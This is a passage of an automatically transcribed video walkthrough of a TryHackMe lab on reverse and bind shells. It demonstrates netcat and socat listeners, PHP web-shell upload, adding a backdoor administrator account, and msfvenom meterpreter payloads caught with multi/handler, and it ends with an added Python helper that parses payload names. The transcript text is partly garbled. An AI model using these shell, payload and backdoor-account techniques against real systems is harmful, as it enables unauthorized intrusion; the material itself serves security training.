on the machine, so we'll pass that, Ctrl+V, paste it in. Before we press enter, because that is going to go to a listener that's not yet set up, we need to create the listener back in the terminal. We'll go ahead and do nc -lvnp and create a listener on port 1234, or the port of choice that you selected, press enter. Now that that's listening, we'll go ahead and execute that command through the browser, and as we can see, if we go to the terminal the cursor is blinking. So we'll go ahead and type ls; looks like nothing happened directly. Do a pwd, print working directory... so I went back, I checked the php-reverse-shell file and it seems that there was a small error, I left the "p" in. So I'm going to take that out, and the IP address is right there; we'll save that and we will re-upload that to the Windows web server. So we'll actually rename this file to php-reverse-shell2, because this is the second PHP file that we've done, and then we will go back to the browser and upload the php-reverse-shell2 file, submit that, and if we go to the uploads directory it should show up alongside the first one that we uploaded, and sure enough, there it is. Let's go ahead and see if it does work, if we do have a listener. So we currently have a listener, nc -lvnp, using port 1234; we'll click it to see if it does execute just by merely clicking it and activating it. It seems that it still was problematic and there was no web shell created... oh, look at that, so it seems like it did create, but just for a short amount of time, barely any time, and then it just exited because the uname command tried to be run. Let me go ahead and try that again just to make sure, and I'm going to keep my terminal open this time, keep it like that so we can see it, press enter, and we can see that for brief milliseconds it was connected, but it was not a stable connection at all; the uname command was not recognized. So it's not saved in the clipboard; once you have uploaded the correct PHP reverse shell file, go ahead and copy that long command from task 11, Webshells, paste it into the clipboard, and we're going to go ahead and change that IP address and port. So this is going to be the IP, take out the brackets as well, 10.10.25.75, and the port is going to be 1234, and we're going to copy that command, the whole thing, and right after php-reverse-shell2.php, right after the name of the file, we're going to do a question mark, ?cmd=, and then whatever we put after this is going to be executed by the machine. So we put that in, paste that in, and make sure that you have your listener running. Now we press enter on that command, and it looks like it successfully executed. Once again it did create a connection, but it was short lived for some reason. Now, to confirm this, I actually went ahead and shut off the attack box, I shut off the machine, and I actually shut down everything. I followed the steps in TryHackMe and sure enough, the same thing happened; it was a brief shell that did connect, so we can confirm that there was a reverse shell that was using PowerShell through this web server. So we'll go ahead and click completed on that; we certainly got our practice in. Now let's move to the next question. Once again, don't get hung up if something doesn't go exactly right; this is just a practice session, so feel free to learn and run these however you want. So do not feel bad if it doesn't go perfectly; remember, this is TryHackMe, there's all sorts of wonky stuff that happens, and things that are certainly not on our part. They even say in the question "and try to obtain a reverse shell using PowerShell", so just the fact that you put in effort is the real value of this question.

"The web server is running with SYSTEM privileges. Create a new user and add it to the administrators group, then login over RDP or WinRM." Okay, so they actually gave us instructions for this. If we go to the Windows practice box, we'll go ahead and log in to this machine; go ahead and copy that command into the clipboard, we'll copy it from the clipboard and paste that into the terminal and press enter. We'll type y for yes; this will log us into that Windows 2019 Server box. If you hover to the right you can see that we can still access the terminal, from which we can run commands, Windows PowerShell commands. So we'll actually go to task 12, Next Steps, and they show us the
syntax for creating users with administrative privileges. So we have the syntax: net user <username> <password> /add. We'll type in BHS as the username, and the password will be BHS, space, /add, and then press enter. We'll now do the second command, net localgroup administrators <username> /add, so we'll do net localgroup administrators BHS (the account we just created) and then /add, press enter, and they have successfully been added to the administrators list. To check that this was done correctly, let's go ahead and open up a new terminal from our THM box, from TryHackMe, then we'll paste that same command for RDP, but we're going to change the username to the user that we just created; it's going to be /u:BHS for me, yours is going to be different, and then the password is going to be in single quotes, we're going to change that to BHS, and press enter. If it connects successfully then it looks like the user was created. It looks like the credentials failed, but... it seems that it was not successful. Let's go back to the Windows desktop with the actual FreeRDP. If you use control and two fingers to zoom out you can see that we have the taskbar there, it's just a little hidden, and you can click that start button, or you can click the magnifying glass, and we will search for command prompt, or just type in cmd and press enter. As you can see we are here at the command prompt, so we should be able to use these net user and net localgroup commands from the command prompt. We'll go ahead and use the first one, net user, the username BHS, password BHS, /add, press enter, and "The command completed successfully." That's a better sign than what we received in that RDP desktop terminal from the attack box. What happened was, when that command completed successfully it created that RDP session with the Windows box; any commands that we put after that are not going to be read because it's focusing now on that RDP session. So we can minimize those and we will add that new user to the administrators group. How do we do that? We do net localgroup administrators (which is the name of the group), space, the username, and then /add, press enter. "The command completed successfully." Nice job guys. Now we can go back to the terminal and we're going to try that command again from task 15, with the username of the user we created and the password that we set, press enter, and it looks like it successfully completed, because we did see that username pop up and it looks like it's opening up a new window for us. All right, so we can go and cross that one off.

"Experiment using socat and netcat to obtain reverse and bind shells on the Windows target." So this is pretty much what we've already done. If you go back to the socat examples, we can see the examples are all right here. We'll switch to our attack box terminal, we'll go ahead and cancel the session that is not being used to connect to the RDP session, and we'll create our listener using TCP, so we'll do that command socat TCP-L: and then the port, we'll do port 1234, space, dash, press enter. So now that that's listening we'll switch it back over to the Windows machine and we'll pull up that command prompt again, and now we will use this command to connect back to that listening session. We'll do socat TCP: the local IP address, that's going to be the IP address that we used from the attack box to start that listener, so it's going to be the one up there, 10.10.90.2, in other words not this Windows machine IP address, and then we'll do a colon, the port, so we set that to 1234 (yours may be different, make sure you're putting the port that you chose), and then we do a space, EXEC:powershell.exe,pipes, and press enter. Ah, so socat is not used within command prompt, it's not installed, so this isn't going to work. Now, in theory this would work if socat or netcat was installed on this Windows system. Another route that could be taken is the one that was used in task 11: to URL encode an argument that will then be executed by the Windows server. That was this long command here; all we would need to do is take that socat or netcat command, URL encode it, and right after the ?cmd= put that command to be executed by the Windows server. Alternatively, if the reverse shell that we created using PowerShell had remained open, we could also run that command through there, but as we know that session didn't last long. So let's go ahead and try netcat: we'll do nc -lvnp and we'll use port 1234. Now if we go back to the PayloadsAllTheThings page you'll remember that they actually have a section specifically for netcat, and not only netcat but they have a section for PowerShell, which we can use on this Windows system. So we'll go ahead and copy this first one; it looks like we have to change the IP address and port, they have a little area for that. Go ahead and change this IP address to the IP address that we will connect to, which is the attack box IP address up there, so that'll be 10.10.90.2, and then the port is going to be 1234. Let's try this with the quotations; I don't know if those will be needed, but we'll just go ahead and try it with them. Then in PowerShell we'll paste that in, and it looks like that PowerShell command was unsuccessful, but you get the point that you can use the PayloadsAllTheThings repository to look for different exploits that you may actually be able to use.

Okay, the next question: "Create a 64-bit Windows Meterpreter shell using msfvenom and upload it to the Windows target. Activate the shell and catch it with multi/handler. Experiment with the features of this shell." Okay, let's check out the msfvenom task, which has examples, and we can see the full command right there: msfvenom -p windows, then where the reverse_tcp file is located, what type of file it's going to be, the listening host and listening port. So let's just use that command. Make sure the attack box is started if it's not started yet, and once that attack box is started go ahead and click the green start
machine button for the Windows practice box. If you still have that RDP session from the previous question you can go ahead and close out of that, and in the terminal for the Windows practice box we'll go ahead and type msfvenom and the rest of this command right here to generate a Windows x64 reverse shell in an exe format that we can upload to the target. So the full command is going to be msfvenom -p for payload, then where's the payload located? They tell us right there, it's located in the windows/x64/shell directory, so we'll go ahead and do windows/x64/shell/ and the name of the file, which is reverse_tcp. It's going to be a file with the exe format, it's going to be an executable, then -o, the output file location, and that's just going to be in the current directory, and we will name it shell.exe. The LHOST is going to be equal to our IP address up there at the top, that's going to be the attack box, so 10.10... yours is going to be different than mine, make sure you're putting the correct one right there at the top. Then we have an LPORT, and the LPORT we will do 1234, and press enter. Aha, that might take a minute or two, but that Windows x64 reverse shell executable file has been created with a file size of 7,168 bytes. We'll do a quick pwd to see where that file was located, and it was located in the /root directory, so if we click on root's home we'll see it right there. The file will be saved by default in whatever directory you were currently in when you created that file, so this one's right in the root home, and you can see it right there. So now we need to upload it to that vulnerable Windows web server. Pull up the browser and we'll type in that http://, so we can type in that IP address that was populated for the Windows shell; it's going to be right over there in the top left hand corner. We'll do http://10.10.188.10 (yours is always going to be different), press enter, and you'll see we have hit that file uploads page. We'll browse, so hit the browse button and we'll go to home, and we'll see that shell.exe; this is root's home directory, and we can click open and submit. All right, file successfully uploaded. So we've created the msfvenom Windows x64 reverse shell executable file and we uploaded that to the Windows vulnerable web shell. Now, how are we going to actually create that connection? Well, we need a listener for that executable to connect back to once we activate it. So you can activate it now, but it's not going to do anything. On our attack box we need to go back to the terminal and type msfconsole; this will start msfconsole, from which we can run the Meterpreter session through Metasploit. So the first step was creating that executable file and uploading it; now the second step is going to be using multi/handler within Meterpreter. So we type in use multi/handler and press enter, and it looks like it gave us the generic shell reverse TCP; that's the exact same shell that we're going to be using for this type of attack, a TCP reverse shell. So we're going to go ahead and do a show options to see if there's anything that we need to set. Looks like the LHOST and the LPORT need to be set, and there's not really many other options besides that. So we'll set the LHOST to the attack box IP address, so it's going to be 10.10.28, the same IP address that we set that exe file to connect back to, so that's going to be our attack box. We'll set the LPORT (you can also do setg if you wanted to set it globally) and we'll set that LPORT to the same port that we specified in the executable file for the Windows reverse shell, which is 1234. Now that that's been set we'll go ahead and run that. So if we try to activate that shell on the vulnerable web server, you'll see, okay, it downloads the shell.exe file. If we click that, double click it, try to run it, go back to the terminal and you can see that the reverse shell has actually started. Now, you could alternatively have gone to that Windows VM, so if we wanted to you could open up another terminal. Let's go ahead and background this shell; we can use the background command. If we go to task 15, Windows practice box, it has that command in there to actually remote desktop into that VM, so we'll go ahead and copy that and paste it into the clipboard, and we'll copy it from the clipboard and we'll paste it into the terminal, and it should automatically log us in. We'll click yes; it has those credentials in there, so I'm going to be logging in as the administrator. You can also log in as the user that we created in the previous question, that we added to that administrators group. You can now go to Firefox and we'll do the same thing: we'll go to that vulnerable web server web page, it may take a second. That's just going to be the IP address I was given for the Windows shell practice; it's over there in the top left hand corner. Do http://10.10.188.10 and press enter. Okay, we're here. Now if we go to the /uploads directory, you'll see that the shell.
exe file has been uploaded regardless of what machine you're using to access the internet on and we'll double click that we'll save that file seems like it aired out but when I click the file explore little folder icon it's right there downloaded so we'll double click that to execute it now this is one of the things I was talking about the OS level the operating system will actually catch malicious files like executables so it will ask us often times it won't even ask you it just say Windows Defender has neutralized this malicious file is not going to run that no chance but we're going to go ahead and run that this is a Sandbox environment so this is representing an older system in fact this is a Windows 2019 server box using running a zamp web server so it's a little bit outdated and of course the longer that you have a system without operating system updates the more viable it's going to be the more susceptible it's going to be two malicious attacks and it looks like nothing has happened but if we go back to our terminal we will see that the command shell session two has closed interesting it looks like there's just popping out a bunch of command shell sessions that are closing for some reason I only activated it on the Windows side of things and also on the Linux side of things or attack box side of things and that may be the result of an unstable internet connection maybe it's a dropping it's trying to connect and then it's dropping again and it creates kind of a cycle so we're going to go ahead and contrl c and stop this for now we're going to go ahead and try that command again I'm going to check the show options one more time looks like the port is set the L host is set so everything looks like it's set correctly we'll go ahead and run that all right so it is listening is doing the reverse TCP Handler on the attack boox IP address with the port 1 2 3 4 so yes it it does seem like this may be an unstable internet connection it did close that session and I 
didn't even create a session so that shows you something the fact that we shut down The Interpreter session started it back up again that executable file was running that whole time looking to connect back to that interpreter IP address for the lhost that we set in that reverse shell executable file for that Windows machine so if we run a who am I command that should tell us what user we are currently logged in as and it looks like it aired out the session closed again we'll do a control Z which will background that interpreter shell and it looks like it stopped the msf console entirely clear it out and try msf console again I'm going to open up a new terminal and try changing the port for the executable file which may be causing the problem and in the Mator will'll type that msf Venom command again so that's going to be msf Venom DP Windows the same one that was given to us in the msf Venom t task 9 msf Venom DP Windows SL x64 SL shell SL reverse TCP and we're going to have this as an executable file so- fexe - o and we're going to give it a different name we'll give it shell 3.exe as the name lhost is going to equal our attack boox IP address that one up at the top there 1010 it seems to be just a poor internet connection my triaging box just disconnected so that just right there 1010 28123 space l Port now for the L Port this time we'll do a different one besides 1 2 3 4 let's try 678 9 press enter okay the file was created with a file size of 7,168 bytes we'll go ahead and check that out to make sure it is there we'll click the places we'll click the home folder and we do have that shell 3.exe file so we'll go ahead and upload that file and then switch back over to the windows VM so to do that within our attack box we'll go to the browser and upload that file so we'll browse to our root home directory which is where our file was saved open and submit looks like it was uploaded success let's go check on the Windows VM so we'll switch over to the windows VM we 
will open up that web browser click cancel on that we'll press enter to view the uploads again and it looks like we do have a new file shell 3.exe so we'll go back to the terminal and make sure that our listener is listening on the correct Port so create a interpreter session we're going to use msf console that will start the Min Bo framework console and we're going to use the multi for SL Handler oops make sure that's spelled correctly all right it is taking us to the payload generic shell reverse TCP and we will set the lhost to R [Music] 101028 123 that attack box IP address up there press enter set the L Port this time not to 1234 but to 6789 press enter we'll do a final show options to check that everything is set correctly and it looks like it is so we'll go ahead and run that and once we've gotten that confirmation that it started that reverse TCP Handler on the attack box IP address with the New Port we go ahead and switch over to the windows VM and activate that shell 3.exe you can double click it or we could cancel that and we could type in the name of the file after uploads forsh 3.exe and it'll pretty much do the same thing it'll prompt us asking us if we want to save or run the file and we'll go ahead and save that now if we look in our downloads folder we'll see that it is there we'll double click that to run it and click run and we'll watch to see if there's a connection made aha it looks like a shell was created and then the command shell session closed once again that may be because this is an unstable internet connection once again we're running a VM within a VM so that can tend to slow things down a little bit command shell is closed so if you save that file run it will see that we still are getting the command shell sessions closing it's unstable connection so first things first we're going to create our Windows meterpreter reverse shell executable file which we can find examples for in the task 9 msf Venom and we are not going to use this 
command msf Venom DP for the reverse shell for Windows we're actually going to use the one it's a little further down that is the windows x64 interpreter reverse TCP so the above was just an msf Venom reverse shell this is actually going to be a meterpreter reverse shell which we are going to use with the multi- Handler in menus so it's still going to be a 64-bit Windows meterpreter shell it's just going to be that it's a meterpreter that it's using to create that msf Venom reverse shell so we'll go ahead and open up a new terminal within the attack box and we will use that same msf Venom command but we will change it slightly so that it's interpreter so that full command will be msf venom dasp for payload and then the type and also concurrently the location of that payload within msf Venom is going to be Windows SL x64 SL shell but if we scroll down to the bottom we'll actually see the examples for the windows meterpreter reverse shell which we can see is also x64 bits so right after the x64 instead of shell we're going to do for SL meterpreter slash reverse TCP all right make sure that you put in that meterpreter cuz the listener we create is going to be using that same meterpreter through msfm finish out the command-f is going to be an executable file so EXE the name of the file we'll do shell 5.exe I've actually created about four of these so you can do this through trial and error the first one may not work for you I initially tried that msf Venom shell reverse TCP command and that did create a file an executable file that was run but ultimately it was not successful because when we were listening through the meterpreter session of course it's not meterpreter it's just a reverse shell so trial in Air Guys we've got that interpreter we have shell 5.exe as the name the listening host or the lhost is going to be equal to the attack box IP address right there 10.10 28123 and don't press enter just yet we're going to do a space and the L Port is going to be we'll 
do 1 2 3 4 and press enter huh looks like something happened it looks like it errored out and that file was not created we can check that in the root home folder so we go to our places home folder nope that did not work but if we do a search for msf Venom payloads related to interpreter we can do a msf Venom D- list of payloads and then we'll do a pipe so we can search we'll GP to search for specific keywords and those are going to be in quotes it's going to be windows for slash it's going to be 64 bits so x64 and then a for Slash meterpreter and then end quotations press enter looks like the payloads was spelled incorrectly do a double check that everything is spelled correctly then press enter and we'll see what pops up here we go we have a interpore reverse TCP so that looks like the same interpreter payload that we just tried this is going to be the windows x64 interpreter SL reverse TCP so upon closer inspection of the question it does just say use the shell it doesn't have to be a reverse shell it could be a bind shell remember these questions are just experimental so go free do whatever you would like on this I'm going to go ahead and try a bind shell and we're going to use the same command msf Venom - P for the payload but this time we will change The Interpreter SL reverse TCP to this one right here mpor bind TCP so we know that that one exists we'll give it a shot reverse uncore bind undor TCP Das app everything's going to be the same and press enter invalid payload it looks like there was not a slash in between the meterpreter and reverse It's actually an underscore so give that another shot and that is also the case for the actual reverse shell so it didn't matter that's why it was giving us that weird error is because we had a forward slash in between The Interpreter and reverse so we go ahead and you can do a bind shell you can do a reverse shell you can do uh any shell that you would like for this one that you can get so we'll change that interpreter 
toore reverse TCP DF and everything looks good we'll press enter it gave us a bunch of gobbly go this time we will try the Mater underscore reverse bind TCP give that a shot I don't get it let's look back through the msf Venom Windows 64x64 bit interpreter payloads that are available so we'll use that Windows x64 interpreter SL reverse TCP payload put in the L host as our attack boox IP put in the L Port 1 2 3 4 looks like it had a little bit of an issue so since tryck is not cooperating we did manage to get a connection however short brief it was we will go ahead and close down this Windows box and we will try this in the Linux box cuz actually the last question was referring to Linux or Windows so you can pretty much use whatever boxes you want for these questions just a matter of getting some practice in and trying different techniques so we'll go ahead and terminate that windshell practice we'll go ahead and click completed on the Windows practice box since we're done with that one and we'll go ahead and start the attack box up again but this time we're going to use the Linux practice box and we'll use the meterpreter session on that to create it through msfm so we'll go ahead and wait for that attack box to start up again and once that attack box is started we'll go ahead and click the green start machine button for that Linux IP address to populate for the Target machine we'll open up a new terminal you'll go into the task 9 msf Venom and it looks like they give us a Linux 32bit stagelist meterpreter payload so this is something that's not stage it's not going to have to run on multiple machines multiple stages it's just going to go boom right on the target machine so let's go let's do that we'll take the command from the top there msf Venom DP this is going to create that exe file we'll do Linux for Slash and the payload was x86 so X8 6 SL meterpreter _ reverse TCP and now we go back up to the command we'll finish that out it's going to be a exe file and 
we're going to name it shell. exe and the L host is going to be equal to our attack box IP address the listening host up at the top there 1010 210172 space and then we will set the L port to whatever you youd like I'll do 777 and press enter and that will create our executable file for the windows shell okay looks like that file was created with 7,168 bytes now we'll upload it to the web server so how do we do that so we'll go ahead to our browser and we will type in that IP address right there for the populated Windows shell practice that's going to be HTTP c1010 23628 for me yours going to be different than mine press enter and we can browse will go to the root home directory the directory that you were in when you created a file if you are uncertain which directory you were in when you created that file just to a simple PWD to print the working directory and we can see there right there the root home directory there it is shell. exe and we'll submit that now that it's uploaded we'll actually activate it from the target machine so we will use the windows VM to do that you can use the RDP command in task 15 they provide it right there so we'll go go ahead and copy that we will paste that into the clipboard copy it from the clipboard paste that in and we'll sign in as the administrator using that password press enter say yes trust the certificate we'll say yes all right so it's rping in we're getting closer to activating that shell okay so once we're rped in we'll go ahead and open up a new web browser and we'll type in the IP address http co10 do10 23628 press enter now we will do a for SL uploads because it's uploaded regardless of what VM you're looking at this through the internet from and we can see the shell. exe files there we'll click that and that will prompt us to save the file so we'll save that then in the file explorer we'll go to our downloads folder and there it is shell. 
exe and to execute files you just double click and we can see this app can't run on your PC to find a version for for your PC check with software publisher so it looks like we'll close that see if we can run it again so it says smart screen can't be reached right now if we run it we actually don't have the interpretor listener set up just quite yet so it's not going to do anything so if we go back to the interpretor session our attack box we'll go ahead and create a new terminal that we can create a interpreter listener from this will be using msf consoles to start the medit multi- Handler interpreter multi- Handler all right once mplay is loaded all you have to do is use multi for SL Handler press enter now that we're using the generic shell reverse TCP we'll go ahead and set the L host to 10.10 do the attack boox IP address which is up there at the top then we'll show options to see if there's anything else that we need to set looks like we need to set the L port and then that'll be it so we will set the L port to 777 press enter is going to be the same port that you specified in that executable file that we uploaded so go ahead and run that now it is started the reverse TCP listener on the attack box IP address using the port 777 which was the port specified in the executable now we'll go ahead and activate that executable file we'll go back to the RDP session and we'll click into the file explorer we'll find that file we'll double click it to run and activate that shell. 
exe and see what happens and if we check the reverse terminal we can see that a session has been open and closed it's creating multiple sessions it's try connect there's unstable internet connection or it's just because Tri Acme is wonky and if you did somehow manage to get a successful connection you can go ahead and use the Menlo commands within that shell the reverse shell to play around with the system experiment with it see what's inside look at files you've owned that box give yourself a p on the back but if you're like the rest of us you go ahead don't feel good if you move on we have proven as the question has asked that you can create a meterpreter session using reverse shells on Windows system so give yourselves the power on the back even if it doesn't work perfectly remember it's just about trying the technique out and learning some of these Concepts we'll go ahead and click completed on that and we'll also go ahead and click the completed box for that task 15 windows practice box and we'll tackle that last question which is create both staged and stagelist Mator shelves for either Target upload and manually activate them catching the Shell with metat does this work so since we're already using the windows box we might as well use this box to create a staged and stagelist payload now we're going to go ahead and cancel this session we'll clear it we'll exit out and to create our stagel payload we'll type the command used previously msf Venom DP for payload Windows x64 shell SL reverse TCP and instead of a forward slash we're going to put a what is it you guess it an underscore because an underscore means that it's stag less it means boom once we get it on the target system it's run it's self-sufficient it does pretty much everything it doesn't need to enact and do another action it just runs right off the target system then we're going to do the- F it's going to be an exe executable the output file name is going to be shell 2.exe because this will be our 
second executable file do lhost is the attack boox IP 10.10 30242 we'll do a space and then the L Port is going to be we'll do 1 2 3 4 and then press enter aha so our files been created we'll go ahead and upload that to the file server we browse and this will be shell two .exe we'll open that submit and then we'll pop over to the RDP session we'll do a quick Refresh on the uploads directory we'll see that shell 2.exe we will save that file and then in the file explorer we'll double click that shell two ah seems that it can't be run now before we activate it we're actually going to do a simple netcat command nc- LV NP from our attack box and the port that you specified in the file I did 1 2 3 4 and it's listing on any IP address through Port 1 2 3 4 so if we activate it because this is a stagel shell it should just automatically connect we'll go ahead and go back to the file explorer and we'll double click that shell 2.exe looks like the spinning turquoise Wheels there we will run that and that is at the operating system level like I said there's safeguards protective layers in the operating system to protect against malicious files being run often times you cannot even download these malicious executable files let alone run them on different machines but this is a Windows 2019 server running a zamp so it's designed in a sandbox environment so that we can have fun and play around with it right and as you know the older a system gets without updates without patches the more susceptible it is to different attacks now we'll switch back over to the terminal and as we can see we have a session within the Windows machine woohoo we are the administrator in the downloads folder can run in LS oh LS is a Linux command remember we're in Windows now to do a staged command let's do the same thing we'll create the file but this time it's going to be a staged reverse shell so a staged payload is actually the command that we just used the windows x64 interpreter SL reverse TCB 
you'll notice that there's lots of forward slashes indicating that it is stage between a stage and a stage less payload is that the stage payload is actually more likely to be stable and to avoid firewalls because once it's sent to the machine and that connection's created that listening connection is created between the target machine and the attack box there is an additional step which it is activated instead of just being activated immediately once that connection is created all in one Fell Swoop so in essence we've already done this so on that note we'll go ahead and click completed on all the tasks give yourselves a pat on the back you did an excellent job this was the in my opinion hardest tracky Junior penetration test or lesson so kudos to you guys for giving it your best I hope that you learned something in this lesson good work today on learning the tactics for using all different kinds of shells reverse shells bind shells interpreter shells we did pretty much everything so so hats off to you guys by the way don't let this be the thing that makes you not want to be a penetration tester just because it's confusing or you're not getting it or you just don't like how the lessons are laid out because when you're doing pen testing for real it can be a lot different than just coursework often times it'll be a lot funner too so this video is long enough as it is but I just want to say I'm proud of you guys thanks for sticking with me I'll see you in the next one try hack me Prix PR linage every I will see you guys in the Next Room Linux privilege escalation I know that we covered Linux a little bit we covered a little bit of Windows now we're going to focus just on Linux I'll see you in the next one I'm Brock from Brock art security keep hustling and take care
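Added example (mine, not the video's or TryHackMe's code): a small Python helper that parses Metasploit payload names by the slash/underscore convention the walkthrough keeps tripping over (staged `stage/stager` vs stageless `stage_stager`) and checks whether a `multi/handler` was configured for the payload msfvenom actually built. It assumes a session only stays open when the handler's PAYLOAD, LHOST and LPORT equal what the executable was generated with; the constructed scenario at the bottom replays the first attempt above, where the executable was `windows/x64/shell/reverse_tcp` but the handler was left at its default `generic/shell_reverse_tcp`.

```python
"""Added example (mine, not the video's or TryHackMe's): parse Metasploit payload
names and check that multi/handler is set up for the payload msfvenom built.
Assumed naming convention (labelled assumption):
  <platform>[/<arch>]/<stage>/<stager>  -> staged    (slash before the stager)
  <platform>[/<arch>]/<stage>_<stager>  -> stageless (underscore before it)
A session only stays open when the handler's PAYLOAD, LHOST and LPORT match
the executable. Helper names are hypothetical; nothing here touches a network."""
from dataclasses import dataclass
from typing import List, Optional

ARCHES = {"x86", "x64", "aarch64", "armle", "mipsle", "mipsbe"}
STAGES = {"shell", "meterpreter"}
STAGERS = {"reverse_tcp", "bind_tcp", "reverse_http", "reverse_https"}


@dataclass(frozen=True)
class Payload:
    platform: str
    arch: Optional[str]
    stage: str
    stager: str
    staged: bool

    @property
    def name(self) -> str:
        """Canonical path, e.g. linux/x86/meterpreter_reverse_tcp."""
        head = [self.platform] + ([self.arch] if self.arch else [])
        return "/".join(head + [self.stage + ("/" if self.staged else "_") + self.stager])


def parse_payload(name: str) -> Payload:
    """Split a payload path into its parts and decide staged vs stageless."""
    parts = name.strip().split("/")
    if len(parts) < 2:
        raise ValueError(f"not a payload path: {name!r}")
    platform, rest = parts[0], parts[1:]
    arch = rest.pop(0) if rest[0] in ARCHES else None
    if len(rest) == 2:                      # stage/stager -> staged
        stage, stager, staged = rest[0], rest[1], True
    elif len(rest) == 1:                    # stage_stager -> stageless
        stage, _, stager = rest[0].partition("_")
        staged = False
    else:
        raise ValueError(f"unexpected shape: {name!r}")
    if stage not in STAGES or stager not in STAGERS:  # e.g. meterpreter_reverse_bind_tcp
        raise ValueError(f"unknown stage/stager in {name!r}")
    return Payload(platform, arch, stage, stager, staged)


@dataclass(frozen=True)
class Handler:
    """What `use multi/handler` was configured with."""
    payload: str
    lhost: str
    lport: int


def check_handler(built: str, built_lhost: str, built_lport: int,
                  handler: Handler) -> List[str]:
    """Reasons this handler would not hold a session from `built`; [] if it matches."""
    want, have = parse_payload(built), parse_payload(handler.payload)
    problems: List[str] = []
    if (handler.lhost, handler.lport) != (built_lhost, built_lport):
        problems.append("LHOST/LPORT differ from the values the executable was built "
                        "with, so nothing connects to this listener")
    if want.staged and not have.staged:
        problems.append(f"staged {want.name} pointed at stageless handler {have.name}: "
                        "it connects, never gets its stage, and the session closes at once")
    elif want != have:
        problems.append(f"handler payload {have.name} does not match {want.name}; "
                        "set PAYLOAD to the exact name given to msfvenom -p")
    return problems


# Constructed replay of the transcript's first attempt: executable built as
# windows/x64/shell/reverse_tcp, handler left at its default generic/shell_reverse_tcp.
ATTACKBOX, PORT = "10.10.28.123", 1234          # values spoken in the video
FIRST_TRY = Handler("generic/shell_reverse_tcp", ATTACKBOX, PORT)
FIXED = Handler("windows/x64/shell/reverse_tcp", ATTACKBOX, PORT)
```

Running `check_handler("windows/x64/shell/reverse_tcp", ATTACKBOX, PORT, FIRST_TRY)` returns the staged-versus-stageless mismatch, while the same call with `FIXED` returns an empty list.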
Info
Channel: Brock Rosen
Views: 1,578
Keywords: free course, beginner, cybersecurity, cyber security, ethical hacking, how to hack, hacking tutorial, junior, what is, penetration test, hacking, free, training, tactics, introductory, friendly, for dummies, get started, lookup, answers, flag, flags, what is a shell, tools, types of shell, netcat, shell stabilization, socat, encrypted shells, common shell payloads, msfvenom, metasploit multi/handler, webshells, next steps, practice and examples, linux practice box, windows practice box, task
Id: zc5Z6C2zmNA
Length: 127min 32sec (7652 seconds)
Published: Sat Dec 09 2023